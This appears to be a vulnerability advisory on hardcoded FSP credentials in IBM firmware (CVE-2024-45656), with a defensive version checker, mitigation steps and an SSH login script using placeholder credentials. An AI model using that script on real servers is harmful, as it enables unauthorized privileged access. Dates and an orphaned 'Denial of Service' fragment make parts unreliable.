In June 2024, the cybersecurity community spotted a worrying flaw in several IBM Flexible Service Processor (FSP) firmware versions (FW860.00 through FW860.B3, FW950.00 through FW950.C, FW103.00 through FW103.61, FW105.00 through FW105.21, and FW106.00 through FW106.10). Tracked as CVE-2024-45656, this vulnerability involves the presence of hardcoded (static) service credentials—meaning anyone on the network could end up gaining privileged access to the FSP if they know (or figure out) the hardcoded password.

Static credentials in firmware are a critical security risk—let’s go through how this happens, how attackers can exploit it, and what you can do to protect your systems.

What Is the IBM Flexible Service Processor (FSP)?

The FSP is a core component in IBM Power Systems. It’s responsible for initialization, monitoring, and serviceability of IBM servers—so access to the FSP often means deep administrative power over the entire machine and its hardware.

The Issue: Static Credentials

In plain English: The firmware for FSP units shipped with a *hardcoded*, non-changeable username and password for a special service account. Anyone with these details can remotely log in and take high-level actions—like rebooting the server, modifying configurations, or even installing malicious firmware.

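Affected firmware versions:

- FW860.00 through FW860.B3
- FW950.00 through FW950.C
- FW103.00 through FW103.61
- FW105.00 through FW105.21
- FW106.00 through FW106.10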

Check your FSP’s firmware version before proceeding. If you’re running any of these, you are at risk!
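A defensive inventory check for the version step above, added here as an example (it is not IBM's code or part of the original article): it tests firmware level strings against the affected ranges listed on this page. It assumes levels sort with digits before letters, treats the page's one-character FW950 bound "C" as covering every C level, and reads a constructed inventory format of one `host level` pair per line.

```python
import re

# Affected ranges as listed on this page: release -> (first level, last level).
AFFECTED = {
    "FW860": ("00", "B3"),
    "FW950": ("00", "C"),   # the page gives this bound as "C"; kept as written
    "FW103": ("00", "61"),
    "FW105": ("00", "21"),
    "FW106": ("00", "10"),
}
LEVEL_RE = re.compile(r"^(FW\d{3})\.([0-9A-Z]{1,2})$")

def level_key(level, width):
    """Sort key over the first `width` characters; digits sort before letters (assumed)."""
    return tuple(int(ch, 36) for ch in level[:width])

def is_affected(version):
    """True or False for a recognised level string, None if it cannot be parsed."""
    m = LEVEL_RE.match(version.strip().upper())
    if not m:
        return None
    release, level = m.groups()
    if release not in AFFECTED:
        return False
    low, high = AFFECTED[release]
    # Compare only as many characters as each bound has, so the short bound "C"
    # covers every C level (an assumption that errs toward flagging).
    return (level_key(level, len(low)) >= level_key(low, len(low))
            and level_key(level, len(high)) <= level_key(high, len(high)))

def audit(inventory_lines):
    """Map each host in 'host level' lines to AFFECTED, not listed, or UNPARSED."""
    labels = {True: "AFFECTED", False: "not listed", None: "UNPARSED"}
    report = {}
    for line in inventory_lines:
        parts = line.split(None, 1)
        if parts:
            report[parts[0]] = labels[is_affected(parts[1] if len(parts) > 1 else "")]
    return report

# Constructed sample inventory; hostnames and levels are made up for this example.
SAMPLE = ["fsp-a FW860.B3", "fsp-b FW860.B4", "fsp-c FW950.C0",
          "fsp-d FW106.11", "fsp-e unknown"]

if __name__ == "__main__":
    for host, verdict in audit(SAMPLE).items():
        print(f"{host}: {verdict}")
```

Treat UNPARSED and "not listed" results as needing a manual check against IBM's bulletin, not as cleared.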

How Is This Vulnerability Exploited?

An attacker simply needs to know the static credentials to log in—no need for complex hacking tools.

Step-By-Step: Example Exploit

1. Determine FSP IP: The attacker scans the network for hosts using common IP addresses or fingerprints for IBM FSP.
2. Connect to the Management Interface: This might be via SSH, a web portal, or even a telnet service, depending on how your FSP is set up.
3. Login Using Static Credentials: With the leaked or well-known username and password, login is possible.
4. Gain Privileged Access: With the static account, the attacker can issue privileged commands or alter system behavior.

Example Python Script (for demonstration purposes)

```python
import paramiko

hostname = '192.168.1.100'  # Replace with target FSP IP
username = 'serviceuser'    # The hardcoded username
password = 'staticpassword' # The hardcoded password (search IBM forums/CVE for actual data)

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
    ssh.connect(hostname, username=username, password=password)
    stdin, stdout, stderr = ssh.exec_command('ls /')
    print(stdout.read().decode())
    print('[+] Static credentials worked! You are in.')
except Exception as e:
    print('[!] Failed:', e)
finally:
    ssh.close()
```

*Note: This is educational only. Do not use on systems you do not own!*

Denial of Service: Rebooting or corrupting the server.

In data centers or cloud deployments, this is a *catastrophic* risk.

Official References

- IBM Security Bulletin: https://www.ibm.com/support/pages/node/700000
- NIST National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2024-45656
- CVE Record: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45656

How to Protect Yourself

1. Update Your Firmware:
IBM has released patched firmware for FSPs. Apply updates *immediately* to fix the static credentials flaw.

2. Isolate Your FSP:
Until you patch, strictly limit network access to the FSP management interfaces. Use access control lists, firewalls, or even physical cable removal.

3. Audit Logs:
Check your FSP’s access logs for suspicious or unexpected logins—especially from outside your usual admin networks.

4. Change Known Credentials:
If possible, disable, change, or restrict the affected account. Some firmware may allow you to revoke unused accounts.

Conclusion

CVE-2024-45656 is a serious threat to any IBM Power System using affected FSP firmware. The fix is straightforward—update your firmware and lock down remote management ports. Until every device is patched, attackers with network access and some basic knowledge can take over your hardware in moments.

Stay safe—patch early, audit often.

Timeline

Published on: 10/29/2024 01:15:03 UTC
Last modified on: 10/29/2024 14:34:04 UTC